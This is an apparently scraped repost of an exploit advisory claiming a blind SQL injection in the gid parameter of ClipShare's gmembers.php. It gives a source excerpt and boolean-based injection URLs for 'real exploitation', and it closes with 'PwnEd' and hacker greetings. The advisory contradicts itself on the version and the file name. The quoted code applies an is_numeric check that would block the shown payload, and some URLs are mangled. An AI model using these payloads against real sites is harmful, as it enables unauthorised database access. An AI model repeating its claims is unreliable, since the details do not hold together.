ClipShare 4.1.1 (gmembers.php, gid param)盲注 - 网站安全

标题: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability  

 

作者: Esac  

 

影响程序: ClipShare - Video Sharing Community Script 4.1.4  

 

官网: http://HdhCmsTestclip-share测试数据  

 

任意版本受影响

 

注意 : this vulnerable work just if there is a group added to the community   

 

 

 

#to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)  

 

   

 

===============================  

 

   

 

#缺陷脚本

 

PHP script : members.php  on line 23   

 

   

 

============ BEGIN OF gmembers.php =======

   

 

html | By using this software, you acknowledge having read this Agreement and agree to be bound thereby. |****************************************************** | Copyright (c) 2006-2007 Clip-Share测试数据. All rights reserved. |************************************************/ require('include/config.php'); require('include/function.php'); require('classes/pagination.class.php'); require('language/' .$_SESSION['language']. '/gmembers.lang.php'); $gname = NULL; $gurl = NULL; $oid = NULL; $gid = ( isset($_REQUEST['gid']) && is_numeric($_REQUEST['gid']) ) ? mysql _real_escape_string($_REQUEST['gid']) : NULL; $sql = "SELECT * FROM group_own WHERE GID='" .$gid. "' limit 1"; $rs = $conn--->execute($sql); if ( $conn->Affected_Rows() == 1 ) { $urlkey = $rs->fields['gurl']; $gname = $rs->fields['gname']; $gupload = $rs->fields['gupload']; $oid = $rs->fields['OID']; STemplate::assign('gname', $gname); STemplate::assign('gurl', $urlkey); STemplate::assign('gupload', $gupload); } else { session_write_close(); header('Location: ' .$config['BASE_URL']. '/error.php?type=group_missing'); die(); } ...........................................; ............................................... ?>

 

 

   

 

===================================================================================  

 

   

 

   

 

    

 

Poc :  

 

   

 

http://HdhCmsTest2cto测试数据 /mavideo/gmembers.php?gid=6 [Blind SQLi]  

 

   

 

Real exploitation :  

 

   

 

 http://server/mavideo/gmembers.php?gid=6 AND 1=1  

 

==> return normal page  

 

   

 

http://server/mavideo/gmembers.php?gid=6 AND 1=2  

 

==> return page with some errors ( or with nothing - white page )  

 

   

 

   

 

   

 

--------------------------------------------------  

 

PwnEd.  

 

Tested version:  

 

Sunday , March 24, 2013 | Version: 4.1.4 | Username: admin | Logout  

 

Copyright © 2006-2008 ClipShare. All rights reserved.  

 

   

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  

 

   

 

Greetz : White Tarbouch Team  

 

   

 

./Esac 

 

查看更多关于ClipShare 4.1.1 (gmembers.php, gid param)盲注 - 网站安全的详细内容...